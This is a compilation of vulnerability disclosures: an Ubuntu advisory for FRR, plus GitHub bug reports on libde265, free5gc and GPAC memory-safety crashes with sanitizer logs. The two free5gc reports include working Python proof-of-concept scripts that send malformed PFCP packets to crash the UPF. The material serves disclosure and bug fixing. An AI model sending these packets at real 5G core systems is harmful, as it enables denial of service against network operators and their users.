Ubuntu Security Notice 6481-1 - It was discovered that FRR incorrectly handled certain malformed NLRI data. A remote attacker could possibly use this issue to cause FRR to crash, resulting in a denial of service. It was discovered that FRR incorrectly handled certain BGP UPDATE messages. A remote attacker could possibly use this issue to cause FRR to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6481-1November 15, 2023frr vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04- Ubuntu 22.04 LTSSummary:FRR could be made to crash if it received specially crafted networktraffic.Software Description:- frr: FRRouting suite of internet protocolsDetails:It was discovered that FRR incorrectly handled certain malformed NLRI data.A remote attacker could possibly use this issue to cause FRR to crash,resulting in a denial of service. (CVE-2023-46752)It was discovered that FRR incorrectly handled certain BGP UPDATE messages.A remote attacker could possibly use this issue to cause FRR to crash,resulting in a denial of service. (CVE-2023-46753)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   frr                             8.4.4-1.1ubuntu1.1Ubuntu 23.04:   frr                             8.4.2-1ubuntu1.5Ubuntu 22.04 LTS:   frr                             8.1-1ubuntu1.7In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6481-1   CVE-2023-46752, CVE-2023-46753Package Information:   https://launchpad.net/ubuntu/+source/frr/8.4.4-1.1ubuntu1.1   https://launchpad.net/ubuntu/+source/frr/8.4.2-1ubuntu1.5   https://launchpad.net/ubuntu/+source/frr/8.1-1ubuntu1.7

Ubuntu Security Notice USN-6481-1

Buffer Overflow vulnerability in strukturag libde265 v1.10.12 allows a local attacker to cause a denial of service via the slice_segment_header function in the slice.cc component.

**SEGV in libde265****Description**

Libde265 v1.0.12 was discovered to contain a SEGV via the function slice\_segment\_header::dump\_slice\_segment\_header at slice.cc.

**Version****ASAN Log**

./dec265/dec265 -c -d -f 153 poc1libde265

AddressSanitizer:DEADLYSIGNAL
=================================================================
==38==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000551716 bp 0x7ffff7ad66a0 sp 0x7fffffff3de0 T0)
==38==The signal is caused by a READ memory access.
==38==Hint: address points to the zero page.
    #0 0x551716 in slice\_segment\_header::dump\_slice\_segment\_header(decoder\_context const\*, int) const /afltest/libde265/libde265/slice.cc:1281:3
    #1 0x4db1b1 in decoder\_context::read\_slice\_NAL(bitreader&, NAL\_unit\*, nal\_header&) /afltest/libde265/libde265/decctx.cc:646:11
    #2 0x4e5626 in decoder\_context::decode\_NAL(NAL\_unit\*) /afltest/libde265/libde265/decctx.cc:1241:11
    #3 0x4e6247 in decoder\_context::decode(int\*) /afltest/libde265/libde265/decctx.cc:1329:16
    #4 0x4cd5c4 in main /afltest/libde265/dec265/dec265.cc:784:17
    #5 0x7ffff790d082 in \_\_libc\_start\_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16
    #6 0x41e66d in \_start (/afltest/libde265/dec265/dec265+0x41e66d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /afltest/libde265/libde265/slice.cc:1281:3 in slice\_segment\_header::dump\_slice\_segment\_header(decoder\_context const\*, int) const
==38==ABORTING

**Reproduction**

./autogen.sh
export CFLAGS="\-g -lpthread -fsanitize=address"
export CXXFLAGS="\-g -lpthread -fsanitize=address"
CC=clang CXX=clang++ ./configure --disable-shared
make -j 32

./dec265/dec265 -c -d -f 153 poc1libde265

**PoC**

poc1libde265: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc1libde265

**Reference**

https://github.com/strukturag/libde265

**Environment**

    ubuntu:20.04
    gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
    clang version 10.0.0-4ubuntu1
    afl-cc++4.09
    

**Credit**

Zeng Yunxiang  
Song Jiaxuan

CVE-2023-47471: SEGV in libde265 in slice_segment_header::dump_slice_segment_header · Issue #426 · strukturag/libde265

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP messages whose Sequence Number is mutated to overflow bytes.

\[Bugs\] UPF crash caused by malformed PFCP message whose Sequence Number is mutated to overflow bytes

**Describe the bug**

While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Sequence Number is mutated to overflow bytes (e.g. 0xFF 0xFF 0xFF 0xFF). This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.

**To Reproduce**

Steps to reproduce the behavior:

1.  Build the UPF with source code
2.  Run the bin/upf with default config/upfcfg.yaml
3.  Run the following POC python script

#!/usr/bin/env python3

import socket

udp\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_DGRAM)
udp\_socket.settimeout(1.0)

pfcp\_association\_setup\_request \= b'\\x20\\x05\\x00\\x1f\\x00\\x00\\x01\\x00\\x00\\x3c\\x00\\x05\\x00\\x0a\\x64\\xc8\\x64\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30\\x00\\x2b\\x00\\x06\\x21\\x00\\x00\\x00\\x00\\x00'

pfcp\_heartbeat\_request \= b'\\x20\\x01\\x00\\x0f\\x00\\x00\\x00\\xff\\xff\\xff\\x00\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30'

udp\_socket.sendto(pfcp\_association\_setup\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.sendto(pfcp\_heartbeat\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.close()

**Expected behavior**

Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the total length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.

**Screenshots**

No special screenshot is provided.

**Environment (please complete the following information):**

*   free5GC Version: v3.3.0
*   OS: Ubuntu 20.04
*   Kernel version: 5.4.5-050405-generic
*   go version: go1.21.1 linux/amd64

**Trace File****Configuration File**

No specific configuration is required.

**PCAP File**

No specific pcap file is provided.

**Log File**

2023-10-24T17:49:15.614745280+08:00 \[INFO\]\[UPF\]\[CFG\] ==================================================
2023-10-24T17:49:15.614761831+08:00 \[INFO\]\[UPF\]\[Main\] Log level is set to \[info\]
2023-10-24T17:49:15.614777264+08:00 \[INFO\]\[UPF\]\[Main\] Report Caller is set to \[false\]
2023-10-24T17:49:15.614837834+08:00 \[INFO\]\[UPF\]\[Main\] starting Gtpu Forwarder \[gtp5g\]
2023-10-24T17:49:15.614864772+08:00 \[INFO\]\[UPF\]\[Main\] GTP Address: "127.0.0.8:2152"
2023-10-24T17:49:15.650332227+08:00 \[INFO\]\[UPF\]\[BUFF\] buff netlink server started
2023-10-24T17:49:15.650439249+08:00 \[INFO\]\[UPF\]\[Perio\] perio server started
2023-10-24T17:49:15.650444691+08:00 \[INFO\]\[UPF\]\[Gtp5g\] Forwarder started
2023-10-24T17:49:15.652112097+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] starting pfcp server
2023-10-24T17:49:15.652132290+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] pfcp server started
2023-10-24T17:49:15.652138607+08:00 \[INFO\]\[UPF\]\[Main\] UPF started
2023-10-24T17:50:42.343823681+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] handleAssociationSetupRequest
2023-10-24T17:50:42.343962121+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\]\[CPNodeID:10.100.200.100\] New node
2023-10-24T17:50:42.347048969+08:00 \[FATA\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] panic: runtime error: slice bounds out of range \[6:4\]
goroutine 10 \[running\]:
runtime/debug.Stack()
	/usr/local/go/src/runtime/debug/stack.go:24 +0x65
github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main.func1()
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x5d
panic({0x860400, 0xc000490210})
	/usr/local/go/src/runtime/panic.go:1038 +0x215
github.com/wmnsk/go-pfcp/ie.(\*IE).UnmarshalBinary(0x10000c0000cbb30, {0xc000490200, 0x20, 0x30})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:371 +0x1a5
github.com/wmnsk/go-pfcp/ie.Parse({0xc000490200, 0xb, 0xb})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:339 +0x48
github.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc000490200, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:632 +0x8c
github.com/wmnsk/go-pfcp/message.(\*HeartbeatRequest).UnmarshalBinary(0xc000096720, {0xc0004901f8, 0x0, 0xadaa82a41536e5d2})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0x6e
github.com/wmnsk/go-pfcp/message.Parse({0xc0004901f8, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x3ab
github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main(0xc000400a90, 0xc0004030d0)
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x4ce
created by github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).Start
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xd2

CVE-2023-47347: [Bugs] UPF crash caused by malformed PFCP messages whose Sequence Number is mutated to overflow bytes · Issue #496 · free5gc/free5gc

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.

\[Bugs\] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero

**Describe the bug**

While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Recovery Time Stamp IE length is mutated to zero. This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.

**To Reproduce**

Steps to reproduce the behavior:

1.  Build the UPF with source code
2.  Run the bin/upf with default config/upfcfg.yaml
3.  Run the following POC python script

#!/usr/bin/env python3

import socket

udp\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_DGRAM)
udp\_socket.settimeout(1.0)

pfcp\_association\_setup\_request \= b'\\x20\\x05\\x00\\x1f\\x00\\x00\\x01\\x00\\x00\\x3c\\x00\\x05\\x00\\x0a\\x64\\xc8\\x64\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30\\x00\\x2b\\x00\\x06\\x21\\x00\\x00\\x00\\x00\\x00'

"""
 PFCP Heartbeat Request with a Recovery Time Stamp IE whose length is mutated to zero
"""
pfcp\_heartbeat\_request \= b'\\x20\\x01\\x00\\x0c\\x00\\x00\\x02\\x00\\x00\\x60\\x00\\x00\\xe8\\x1f\\xe7\\xb4'

udp\_socket.sendto(pfcp\_association\_setup\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.sendto(pfcp\_heartbeat\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.close()

**Expected behavior**

Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the IE length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.

**Screenshots**

No special screenshot is provided.

**Environment (please complete the following information):**

*   free5GC Version: v3.3.0
*   OS: Ubuntu 20.04
*   Kernel version: 5.4.5-050405-generic
*   go version: go1.21.1 linux/amd64

**Trace File****Configuration File**

No specific configuration is required.

**PCAP File**

No specific pcap file is provided.

**Log File**

time="2023-09-22T03:24:35.891194467+08:00" level="info" msg="UPF version:  \\n\\tNot specify ldflags (which link version) during go build\\n\\tgo version: go1.21.1 linux/amd64" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.904235696+08:00" level="info" msg="Read config from \[upfcfg.yaml\]" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.904663072+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.904772210+08:00" level="info" msg="(\*factory.Config)(0xc0000147d0)({\\n\\tVersion: (string) (len=5) \\"1.0.3\\",\\n\\tDescription: (string) (len=31) \\"UPF initial local configuration\\",\\n\\tPfcp: (\*factory.Pfcp)(0xc00006f170)({\\n\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tNodeID: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tRetransTimeout: (time.Duration) 1s,\\n\\t\\tMaxRetrans: (uint8) 3\\n\\t}),\\n\\tGtpu: (\*factory.Gtpu)(0xc00006f320)({\\n\\t\\tForwarder: (string) (len=5) \\"gtp5g\\",\\n\\t\\tIfList: (\[\]factory.IfInfo) (len=1 cap=1) {\\n\\t\\t\\t(factory.IfInfo) {\\n\\t\\t\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\t\\t\\tType: (string) (len=2) \\"N3\\",\\n\\t\\t\\t\\tName: (string) \\"\\",\\n\\t\\t\\t\\tIfName: (string) \\"\\",\\n\\t\\t\\t\\tMTU: (uint32) 0\\n\\t\\t\\t}\\n\\t\\t}\\n\\t}),\\n\\tDnnList: (\[\]factory.DnnList) (len=1 cap=1) {\\n\\t\\t(factory.DnnList) {\\n\\t\\t\\tDnn: (string) (len=8) \\"internet\\",\\n\\t\\t\\tCidr: (string) (len=12) \\"10.60.0.0/24\\",\\n\\t\\t\\tNatIfName: (string) \\"\\"\\n\\t\\t}\\n\\t},\\n\\tLogger: (\*factory.Logger)(0xc000022e40)({\\n\\t\\tEnable: (bool) true,\\n\\t\\tLevel: (string) (len=4) \\"info\\",\\n\\t\\tReportCaller: (bool) false\\n\\t})\\n})\\n" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.905047979+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.905060906+08:00" level="info" msg="Log level is set to \[info\]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905071569+08:00" level="info" msg="Report Caller is set to \[false\]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905097803+08:00" level="info" msg="starting Gtpu Forwarder \[gtp5g\]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905106855+08:00" level="info" msg="GTP Address: \\"127.0.0.8:2152\\"" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.955858915+08:00" level="info" msg="buff netlink server started" CAT="BUFF" NF="UPF"
time="2023-09-22T03:24:35.956003408+08:00" level="info" msg="perio server started" CAT="Perio" NF="UPF"
time="2023-09-22T03:24:35.956021132+08:00" level="info" msg="Forwarder started" CAT="Gtp5g" NF="UPF"
time="2023-09-22T03:24:35.965098244+08:00" level="info" msg="starting pfcp server" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:35.965152469+08:00" level="info" msg="pfcp server started" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:35.965258101+08:00" level="info" msg="UPF started" CAT="Main" NF="UPF"
time="2023-09-22T03:24:52.058728637+08:00" level="info" msg="handleAssociationSetupRequest" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:52.058889668+08:00" level="info" msg="New node" CAT="PFCP" CPNodeID="10.100.200.100" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:52.058307700+08:00" level="fatal" msg="panic: runtime error: slice bounds out of range \[6:4\]\\ngoroutine 6 \[running\]:\\nruntime/debug.Stack()\\n\\t/snap/go/10339/src/runtime/debug/stack.go:24 +0x5e\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main.func1()\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x4a\\npanic({0x84f480?, 0xc0001c4318?})\\n\\t/snap/go/10339/src/runtime/panic.go:914 +0x21f\\ngithub.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc00028f578?, 0xc00028f570?, 0x7f0972c4e640?})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:637 +0x185\\ngithub.com/wmnsk/go-pfcp/message.(\*HeartbeatRequest).UnmarshalBinary(0xc0002935c0, {0xc00028f570, 0x10, 0x10})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0xb3\\ngithub.com/wmnsk/go-pfcp/message.Parse({0xc00028f570, 0x10, 0x10})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x325\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main(0xc0005ba0d0, 0xc00007a9d0)\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x48b\\ncreated by github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).Start in goroutine 1\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xb8\\n" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"

CVE-2023-47345: [Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero · Issue #483 · free5gc/free5gc

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a stack overflow via the hevc_parse_vps_extension function at /media_tools/av_parsers.c.

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master
    

**Platform**

    $ uname -a
    Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
    

**Asan**

    /home/user/vul/MP4Box_crash/id000085sig06src003627time38285673execs366724ophavocrep8
    [31m[HEVC] Error parsing NAL unit type 2
    [0m=================================================================
    ==833362==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdcf3828d0 at pc 0x7f6e8e6ab0c1 bp 0x7ffdcf382870 sp 0x7ffdcf382868
    WRITE of size 1 at 0x7ffdcf3828d0 thread T0
        #0 0x7f6e8e6ab0c0 in hevc_parse_vps_extension /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:7735:42
        #1 0x7f6e8e66492e in gf_hevc_read_vps_bs_internal /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:8095:9
        #2 0x7f6e8e66b0e5 in gf_hevc_parse_nalu_bs /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:8756:30
        #3 0x7f6e8f25c2ca in naludmx_check_dur /home/user/fuzzing_gpac/gpac/src/filters/reframe_nalu.c:576:10
        #4 0x7f6e8f264622 in naludmx_check_pid /home/user/fuzzing_gpac/gpac/src/filters/reframe_nalu.c:1826:3
        #5 0x7f6e8f252dc5 in naludmx_process /home/user/fuzzing_gpac/gpac/src/filters/reframe_nalu.c:3370:4
        #6 0x7f6e8edafa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7
        #7 0x7f6e8ed7d47b in gf_fs_thread_proc /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2105:3
        #8 0x7f6e8ed7b5cf in gf_fs_run /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2405:3
        #9 0x7f6e8e62ac6a in gf_dasher_process /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:1236:6
        #10 0x5572d97a66dc in do_dash /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:4831:15
        #11 0x5572d9797b6e in mp4box_main /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:6245:7
        #12 0x7f6e8d629d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #13 0x7f6e8d629e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #14 0x5572d96bfdd4 in _start (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x82dd4) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
    
    Address 0x7ffdcf3828d0 is located in stack of thread T0 at offset 80 in frame
        #0 0x7f6e8e6a4abf in hevc_parse_vps_extension /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:7690
    
      This frame has 12 object(s):
        [32, 48) 'dimension_id_len' (line 7693)
        [64, 80) 'dim_bit_offset' (line 7693) <== Memory access at offset 80 overflows this variable
        [96, 100) 'layer_set_idx_for_ols_minus1' (line 7695)
        [112, 117) 'nb_output_layers_in_output_layer_set' (line 7696)
        [144, 149) 'ols_highest_output_layer_id' (line 7697)
        [176, 240) 'num_direct_ref_layers' (line 7700)
        [272, 336) 'num_pred_layers' (line 7700)
        [368, 372) 'num_layers_in_tree_partition' (line 7700)
        [384, 400) 'dependency_flag' (line 7701)
        [416, 672) 'id_pred_layers' (line 7701)
        [736, 800) 'layer_id_in_list_flag' (line 7706)
        [832, 896) 'OutputLayerFlag' (line 7707)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:7735:42 in hevc_parse_vps_extension
    Shadow bytes around the buggy address:
      0x100039e684c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e684d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e684e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e684f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e68500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x100039e68510: f1 f1 f1 f1 00 00 f2 f2 00 00[f2]f2 04 f2 05 f2
      0x100039e68520: f2 f2 05 f2 f2 f2 00 00 00 00 00 00 00 00 f2 f2
      0x100039e68530: f2 f2 00 00 00 00 00 00 00 00 f2 f2 f2 f2 04 f2
      0x100039e68540: 00 00 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e68550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e68560: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==833362==ABORTING
    

**Reproduce****POC File**

https://github.com/gandalf4a/crash\_report/blob/main/gpac/MP4Box/sbo\_7735

**Credit**

CVE-2023-48014: stack-buffer-overflow in /gpac/src/media_tools/av_parsers.c:7735:42 in hevc_parse_vps_extension · Issue #2613 · gpac/gpac

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a double free via the gf_filterpacket_del function at /gpac/src/filter_core/filter.c.

    $ ./MP4Box -version
    MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master
    

    $ uname -a
    Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
    

    /home/user/vul/MP4Box_crash/id000037sig06src002502time27968081execs258947ophavocrep16
    [32m[iso file] Unknown box type 00000000 in parent moov
    [0m[32m[iso file] Unknown top-level box type 00000100
    [0m[32m[Dasher] No template assigned, using $File$_dash$FS$$Number$
    [0m[32m[Dasher] No bitrate property assigned to PID V1, computing from bitstream
    [0m[31m[IsoMedia] Failed to fetch initial sample 1 for track 2
    [0m[32m[iso file] Unknown box type 00000000 in parent moov
    [0m[33m[Dasher] Representation not initialized, dropping non-SAP1/2 packet CTS 18446744073709551615/12288
    [0m[31m[IsoMedia] Failed to fetch initial sample 1 for track 2
    [0m[31m[MuxIsom] Packet with no CTS assigned, cannot store to track, ignoring
    [0m[31m[IsoMedia] File truncated, aborting read for track 1
    [0m[31m[IsoMedia] Failed to fetch initial sample 1 for track 2
    [0m[37mDashing P1 AS#1.1(V) done (1 segs)
    [0m[31m[Dasher] Couldn't compute bitrate of PID V1 in time for manifest generation, please specify #Bitrate property
    [0m[31m[Dasher] Couldn't compute bitrate of PID V1 in time for manifest generation, please specify #Bitrate property
    [0m[32m[MPD] Generating MPD at time 2023-10-08T12:38:38.043Z
    [0m[32m[Dasher] End of Period 
    [0m[32m[Dasher] End of MPD (no more active streams)
    [0m=================================================================
    ==827317==ERROR: AddressSanitizer: attempting double-free on 0x619000015980 in thread T0:
        #0 0x55e7797a5972 in free (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105972) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f525cd97945 in gf_filterpacket_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:38:17
        #2 0x7f525cd6a022 in gf_fq_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter_queue.c:105:33
        #3 0x7f525cda14e5 in gf_filter_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:664:3
        #4 0x7f525cd6ede9 in gf_fs_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:782:4
        #5 0x7f525c6283f6 in gf_dasher_clean_inputs /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:164:3
        #6 0x7f525c6283f6 in gf_dasher_del /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:173:2
        #7 0x55e779809d2d in do_dash /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:4894:2
        #8 0x55e7797fab6e in mp4box_main /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:6245:7
        #9 0x7f525b629d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #10 0x7f525b629e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #11 0x55e779722dd4 in _start (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x82dd4) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
    
    0x619000015980 is located 0 bytes inside of 1084-byte region [0x619000015980,0x619000015dbc)
    freed by thread T0 here:
        #0 0x55e7797a6046 in __interceptor_realloc (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x106046) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f525c4f7ab6 in Media_GetSample /home/user/fuzzing_gpac/gpac/src/isomedia/media.c:619:30
        #2 0x7f525c45d7b3 in gf_isom_get_sample_ex /home/user/fuzzing_gpac/gpac/src/isomedia/isom_read.c:1975:6
        #3 0x7f525d05a156 in isor_reader_get_sample /home/user/fuzzing_gpac/gpac/src/filters/isoffin_read_ch.c:398:19
        #4 0x7f525d04d2d5 in isoffin_process /home/user/fuzzing_gpac/gpac/src/filters/isoffin_read.c:1486:5
        #5 0x7f525cdafa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7
    
    previously allocated by thread T0 here:
    LLVMSymbolizer: error reading file: No such file or directory
        #0 0x55e7797a6046 in __interceptor_realloc (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x106046) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f525cd00add in gf_filter_pck_expand /home/user/fuzzing_gpac/gpac/src/filter_core/filter_pck.c:1846:15
        #2 0x7ffd05c3a8df  ([stack]+0x328df)
    
    SUMMARY: AddressSanitizer: double-free (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105972) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) in free
    ==827317==ABORTING

CVE-2023-48013: double-free in gf_filterpacket_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:38:17 · Issue #2612 · gpac/gpac

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a heap-use-after-free via the flush_ref_samples function at /gpac/src/isomedia/movie_fragments.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

gandalf4a opened this issue

Oct 8, 2023

· 0 comments

**Comments**

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master
    

**Platform**

    $ uname -a
